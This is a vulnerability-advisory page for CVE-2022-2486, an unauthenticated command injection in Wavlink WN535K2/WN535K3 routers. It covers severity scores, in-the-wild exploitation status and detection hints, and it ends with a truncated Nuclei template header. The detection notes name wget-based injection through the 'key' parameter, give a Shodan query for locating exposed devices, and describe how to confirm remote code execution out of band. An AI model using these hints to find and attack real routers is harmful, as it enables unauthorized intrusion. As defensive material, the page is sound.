CVE-2022-2486
published 2022-07-20CVE-2022-2486: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file…
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
26.05%
97.7th percentile
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn535k2 | — | — |
| wavlink | wn535k3 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTTP GET requests to /cgi-bin/mesh.cgi with page=upgrade and a key parameter containing shell metacharacters (e.g., semicolons, quotes, wget commands) indicative of OS command injection attempts. ↗
- →Shodan query 'http.title:"Wi-Fi APP Login"' can be used to identify exposed Wavlink WN535K2/WN535K3 devices on the internet. ↗
- →Successful exploitation results in an HTTP 500 response from the target device; use this status code combined with an out-of-band HTTP interaction (OAST/interactsh) to confirm RCE. ↗
- →Monitor for outbound HTTP requests (wget) originating from Wavlink router processes, which would indicate successful command injection via the key parameter. ↗
- ·The vulnerability is unauthenticated (PR:N/UI:N), meaning no credentials are required to exploit it. Detection rules should not filter out unauthenticated requests to this endpoint. ↗
- ·The OAST-based detection template requires an out-of-band interaction server (e.g., interactsh) to confirm exploitation, as the injected command triggers an outbound wget rather than returning output in-band. ↗
- ·Affected devices are Wavlink WN535K2 and WN535K3 only; scope detection rules to CPE cpe:2.3:h:wavlink:wl-wn535k2 and the associated WN535K3 model. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c8qm-jmpw-q7p3: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3
ghsa_unreviewed·2022-07-21
CVE-2022-2486 [CRITICAL] CWE-78 GHSA-c8qm-jmpw-q7p3: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
VulnCheck
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 8.0
CVE-2022-2486 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
No detection rules found.
Nuclei
Wavlink WN535K2/WN535K3 - OS Command Injection
nuclei·CVSS 9.8
CVE-2022-2486 [CRITICAL] Wavlink WN535K2/WN535K3 - OS Command Injection
Wavlink WN535K2/WN535K3 - OS Command Injection
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2022-2486
info:
name: Wavlink WN535K2/WN535K3 - OS Command Injection
author: For3stCo1d
severity: critical
description: |
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain fu
2022-07-20
Published
Exploited in the wild